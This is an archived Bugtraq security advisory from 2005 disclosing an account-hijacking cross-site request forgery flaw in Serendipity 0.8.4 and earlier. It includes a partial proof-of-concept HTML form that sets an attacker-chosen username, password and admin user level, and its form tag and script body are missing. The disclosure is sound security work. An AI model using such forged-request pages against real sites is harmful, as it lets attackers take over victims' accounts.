Home page logo

bugtraq logo Bugtraq mailing list archives

Serendipity: Account Hijacking / CSRF Vulnerability
From: enji () infosys tuwien ac at
Date: 29 Sep 2005 12:58:48 -0000

Serendipity: Account Hijacking / CSRF Vulnerability
Technical University of Vienna Security Advisory
TUVSA-0509-001, September 29, 2005

Affected applications

Serendipity (www.s9y.org)

Versions 0.8.4 and prior.


An attacker is able to change the username and password of a logged-in user
(and can therefore hijack his account) by tricking the user into clicking a
link to a page with the following contents:

        <input type="text" name="username" value="evilguy" />
        <input type="text" name="password" value="evilpass" />
        <input type="text" name="realname" value="John Doe" />
        <input type="text" name="userlevel" value="255"/>
        <input type="text" name="email" value="john () example com" />
        <input type="text" name="lang" value="en"/>
        <input type="submit" name="SAVE" value="Save" />

    <script type="text/javascript">

The fields "your-server" and "path-to-s9y" in the form's action attribute have to
be adjusted accordingly. 

Similar attacks (termed as "Cross-Site Request Forgery" or CSRF) can be
launched for performing other requests disguised as the victim.
However, this problem is not limited to Serendipity, but affects a large
number of comparable web applications available at this time.


Version 0.8.5 of Serendipity is reported by the developers to fix
the Account Hijacking vulnerability as well as the general CSRF problem itself.


Thanks to Serendipity developer Garvin Hicking for his quick response and
professional cooperation.

Nenad Jovanovic
Secure Systems Lab 
Technical University of Vienna 

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]